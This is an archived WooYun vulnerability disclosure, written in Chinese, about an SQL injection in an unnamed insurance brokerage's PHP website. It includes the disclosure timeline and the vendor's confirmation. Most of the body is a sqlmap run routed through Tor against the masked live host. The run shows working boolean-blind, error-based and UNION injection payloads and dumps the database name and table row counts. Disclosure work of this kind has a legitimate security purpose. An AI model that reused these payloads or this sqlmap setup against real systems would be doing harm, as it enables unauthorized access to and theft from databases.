乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-09: 细节已通知厂商并且等待厂商处理中 2015-12-10: 厂商已经确认,细节仅向厂商公开 2015-12-20: 细节向核心白帽子及相关领域专家公开 2015-12-30: 细节向普通白帽子公开 2016-01-09: 细节向实习白帽子公开 2016-01-23: 细节向公众公开
某保險經紀人股份有限公司SQL注入
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/new/index.php?method=broker1&id=12" --is-dba --dbs --current-db---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=broker1&id=12 AND 2003=2003 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: method=broker1&id=12 AND (SELECT 8330 FROM(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8330=8330,1))),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (N) - 18 columns Payload: method=broker1&id=-3177 UNION ALL SELECT 'N','N','N','N','N','N','N','N','N','N','N','N','N','N',CONCAT(0x717a627871,0x65596552654b63735a55,0x7178627a71),'N','N','N'-----web application technology: PHP 5.4.45, Apacheback-end DBMS: MySQL 5.0current database: 'wethinkc_db'current user is DBA: Falseavailable databases [2]:[*] information_schema[*] wethinkc_dbDatabase: wethinkc_db+-----------------------+---------+| Table | Entries |+-----------------------+---------+| cs_file | 685 || cs_activity | 188 || cfg_enum | 165 || cs_people | 120 || crm_perm_tree | 113 || page_view | 92 || cs_lecturer | 61 || crm_menu_tree | 57 || cs_course | 51 || cs_course_level3 | 50 || cs_partner | 24 || cs_point | 24 || cs_course_topic | 22 || cs_activity_topic | 20 || cs_we_photo | 17 || cs_cfp | 15 || cs_community | 15 || cs_news | 14 |<......>
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-12-10 22:16
感謝通報
暂无